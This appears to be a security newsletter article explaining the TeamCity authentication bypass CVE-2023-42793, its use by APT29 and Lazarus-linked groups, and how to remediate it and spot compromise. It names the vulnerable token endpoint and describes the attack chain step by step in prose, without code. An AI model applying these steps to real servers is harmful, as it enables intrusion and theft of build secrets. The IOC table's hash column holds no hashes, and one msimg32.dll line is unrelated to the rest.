CVE-2023-42793 Explained: JetBrains TeamCity Authentication Bypass (CVSS 9.8)
A pre-authentication remote code execution vulnerability in JetBrains TeamCity CI/CD servers exploited by North Korean and Russian nation-state APTs for software supply chain attacks. No credentials required — one HTTP request generates an admin token.
CVE-2023-42793 is a pre-authentication authentication bypass in JetBrains TeamCity — the CI/CD platform used by thousands of software development organisations to automate building, testing, and deploying code. Disclosed September 6, 2023, with a CVSS score of 9.8, it allows an unauthenticated attacker to generate an admin API token with a single HTTP request, then use that token for full server compromise including remote code execution.
The severity compounds beyond the technical vulnerability. TeamCity holds the keys to software supply chains: source code repositories, build secrets, deployment credentials, code signing certificates, and the pipelines that determine what code reaches production. Nation-state threat actors understand this. Russian APT29 and North Korea's Lazarus Group both exploited CVE-2023-42793 to attack software vendors, seeking the same access that enabled the SolarWinds supply chain attack.
How CVE-2023-42793 Works: One Request to Admin
TeamCity exposes a REST API for automation and integration. The authentication bypass exists in a specific API endpoint that is accessible before authentication is established. The endpoint's path-handling logic allows an unauthenticated request to reach a token-generation function that should require an authenticated admin session.
By sending a crafted HTTP request to `/app/rest/users/id:1/tokens/RPC2` with a path manipulation that bypasses the authentication middleware, an attacker receives a valid authentication token for the first TeamCity admin user (ID 1 — the default administrative account). The token returned is a fully valid long-lived API authentication token with administrator privileges.
With the admin token, the attacker has complete control over the TeamCity instance. They can create new admin users, upload malicious TeamCity plugins (which execute as the TeamCity server process), run shell commands via TeamCity's build step execution, and access all stored credentials, source code, and build artifacts.
Identify internet-exposed TeamCity servers
Scan for TeamCity login pages. The login interface is distinctive and readily identifiable. Shodan and similar tools indexed thousands of unpatched TeamCity instances after the advisory was published.
Send unauthenticated token generation request
Send an unauthenticated HTTP POST to the token generation REST endpoint with a URL path that bypasses middleware authentication checks. TeamCity returns a valid admin API token in the response.
Create backdoor admin account
Use the admin token to create a new administrative user account via the REST API. This provides persistent access independent of the original exploit and survivable through token rotation.
Upload malicious plugin for code execution
Upload a crafted TeamCity plugin ZIP file containing a malicious Java class. When installed, the plugin executes server-side with the permissions of the TeamCity server process — typically a service account with access to all build secrets and credential stores.
Exfiltrate secrets and implant in build pipelines
Extract all stored credentials (VCS passwords, cloud API keys, signing certificates), exfiltrate source code repositories, and optionally modify build scripts to inject malicious code into future software artifacts for supply chain compromise.
Nation-State Exploitation: APT29 and Lazarus Group Objectives
Two of the most capable nation-state threat actors in the world exploited CVE-2023-42793, with different but equally serious objectives.
Russian APT29 (COZY BEAR, Midnight Blizzard): CISA, the FBI, and NSA issued joint Advisory AA23-347A confirming APT29 exploited CVE-2023-42793 against software developers and IT organisations. APT29's objective was intelligence collection — stealing source code, developer credentials, and proprietary software from targets of strategic interest. APT29 is the group behind the 2020 SolarWinds supply chain attack and has a documented long-term interest in software supply chain access vectors.
North Korean Lazarus Group (Diamond Sleet, Onyx Sleet): Microsoft confirmed North Korean actors exploited CVE-2023-42793 for dual purposes. Diamond Sleet (Lazarus-linked) used access to exfiltrate source code and implant malicious code in build pipelines for downstream supply chain attacks. Onyx Sleet deployed backdoors for persistent access and conducted ransomware operations to generate revenue alongside intelligence collection.
“The actor has exploited the vulnerability to gain access to multiple TeamCity servers. SVR [Russian Foreign Intelligence Service] cyberactors use a variety of tools and techniques, including this vulnerability, to gain initial access to victim environments.”
— CISA / FBI / NSA Joint Advisory AA23-347A, December 2023
Patching and Fully Remediating CVE-2023-42793
Patching closes the authentication bypass. But if the server was exposed during the exploitation window, comprehensive post-patch remediation is mandatory — treating the server as patched-but-not-investigated is insufficient.
Upgrade to TeamCity 2023.05.4 immediately
The definitive fix. For teams unable to upgrade immediately, JetBrains released a standalone security patch plugin compatible with TeamCity versions 2017.1 and later. Download from the JetBrains Security Advisory. Verify patch installation by confirming the unauthenticated token endpoint returns 401 Unauthorized.
Audit all admin user accounts
Review all TeamCity administrator accounts. Remove any accounts not recognisable to your team. Check creation timestamps — any admin account created after your exposure window is a likely backdoor. Pay particular attention to accounts with generic or plausible-looking names.
Rotate all credentials stored in TeamCity
TeamCity stores VCS credentials (Git tokens, SVN passwords), cloud provider API keys, SSH keys, deployment credentials, and code signing certificate stores. Rotate every stored credential. Assume all were exfiltrated if the server was running vulnerable software in an internet-exposed state.
Review build history for tampering
Examine recent build logs, build configurations, and artifact histories for unexpected modifications. Look for added build steps, modified scripts, and unusual artifact outputs. Nation-state actors targeting supply chains specifically modify build pipelines — the evidence will be in build configuration changes.
Restrict TeamCity to internal network access
TeamCity should not be internet-accessible unless required by your architecture. Place TeamCity behind a VPN or in an internal network segment with firewall rules blocking external access. The vast majority of exploit attempts used internet-facing TeamCity servers as entry points.
Indicators of Compromise for CVE-2023-42793
Look for the following in TeamCity logs and server filesystem after determining whether the server was vulnerable and internet-exposed.
| Artifact | Type | SHA-256 (Truncated) |
|---|---|---|
| Unrecognised administrator user accounts in TeamCity | TeamCity admin UI / REST API user list | Check Administration > Users for accounts not created by your team |
| REST API requests to /app/rest/users/id:1/tokens/ without prior authentication | TeamCity server logs / web server access logs | Unauthenticated POST to token endpoint precedes exploitation |
| Unexpected plugin ZIP uploads in teamcity-data/plugins/ | TeamCity filesystem | Unknown .zip files in the plugins directory indicate malicious plugin installation |
| ForestTiger, ScopeHook, ScoutDoor backdoors (North Korean tooling) | Process / filesystem artifacts | Microsoft documented these payloads deployed by Diamond Sleet via TeamCity access |
Any instance of msimg32.dll found outside C:\Windows\System32 is an active IOC. Isolate the host immediately. Full hashes and IOC lists are available via the Cisco Talos GitHub repository.
The bottom line
CVE-2023-42793 is a vulnerability that carries consequences well beyond the compromised TeamCity server itself. Software supply chains are among the highest-value targets in modern threat intelligence operations — the SolarWinds incident proved that compromising a CI/CD platform can result in thousands of downstream victims who receive malicious software through a trusted update mechanism. APT29 and Lazarus Group understood this when they prioritised CVE-2023-42793 exploitation.
If your organisation runs on-premises TeamCity and did not patch before nation-state actors began exploiting this vulnerability in September 2023, the remediation is not simply applying the patch. It requires treating the server as compromised, rotating every credential it held, auditing every build configuration it managed, and reviewing every artifact it produced during the potential compromise window. The software your TeamCity server built may need to be reviewed too.
Frequently asked questions
What is CVE-2023-42793?
CVE-2023-42793 is a CVSS 9.8 authentication bypass in JetBrains TeamCity on-premises servers. An unauthenticated attacker sends a crafted HTTP request to a specific TeamCity REST API endpoint, generating a valid admin authentication token without any credentials. The token can then be used to execute arbitrary code via TeamCity's plugin upload or script execution features.
Which versions of TeamCity are affected?
All on-premises JetBrains TeamCity versions prior to 2023.05.4 are affected. TeamCity Cloud is not affected — it was patched before the public disclosure. If you are running any on-premises TeamCity server below 2023.05.4, you should treat it as compromised until you have patched and investigated.
Why is CVE-2023-42793 dangerous for software supply chains?
TeamCity manages the build, test, and deployment pipelines for software. A compromised TeamCity server gives an attacker control over build processes — allowing them to inject malicious code into compiled artifacts, modify deployment scripts, exfiltrate source code and build secrets, steal code signing certificates, and tamper with packages before they reach end users or production. This is precisely the access needed for a SolarWinds-style supply chain attack.
Was CVE-2023-42793 exploited in the wild?
Yes, extensively. CISA, FBI, and NSA issued a joint advisory confirming that Russian APT29 (COZY BEAR) exploited CVE-2023-42793 to compromise TeamCity servers at organisations in the US and allied nations for intelligence collection. Microsoft confirmed that North Korean groups Diamond Sleet (Lazarus-linked) and Onyx Sleet also exploited the vulnerability, with objectives including source code theft, supply chain compromise, and ransomware deployment.
How do I fix CVE-2023-42793?
Upgrade to TeamCity 2023.05.4 or later. If you cannot immediately upgrade, JetBrains released a standalone security patch plugin that can be applied to versions 2017.1 and later without a full upgrade. After patching, audit all admin user accounts, reset API tokens, rotate all secrets stored in TeamCity (VCS credentials, deployment keys, certificate stores), and review build history for unauthorized modifications.
Sources & references
- NVD
- JetBrains Security Advisory
- CISA / FBI / NSA Advisory AA23-347A — Russian APT29 Targets JetBrains TeamCity Servers
- Microsoft Threat Intelligence — Diamond Sleet and Onyx Sleet Exploit CVE-2023-42793
- Rapid7 Attack Analysis
Get threat intel before your inbox does.
50,000+ security professionals read Decryption Digest for early warnings on zero-days, ransomware, and nation-state campaigns. Free, weekly, no spam.
Unsubscribe anytime. We never sell your data.
Founder & Cybersecurity Evangelist, Decryption Digest
Cybersecurity professional with expertise in threat intelligence, vulnerability research, and enterprise security. Covers zero-days, ransomware, and nation-state operations for 50,000+ security professionals weekly.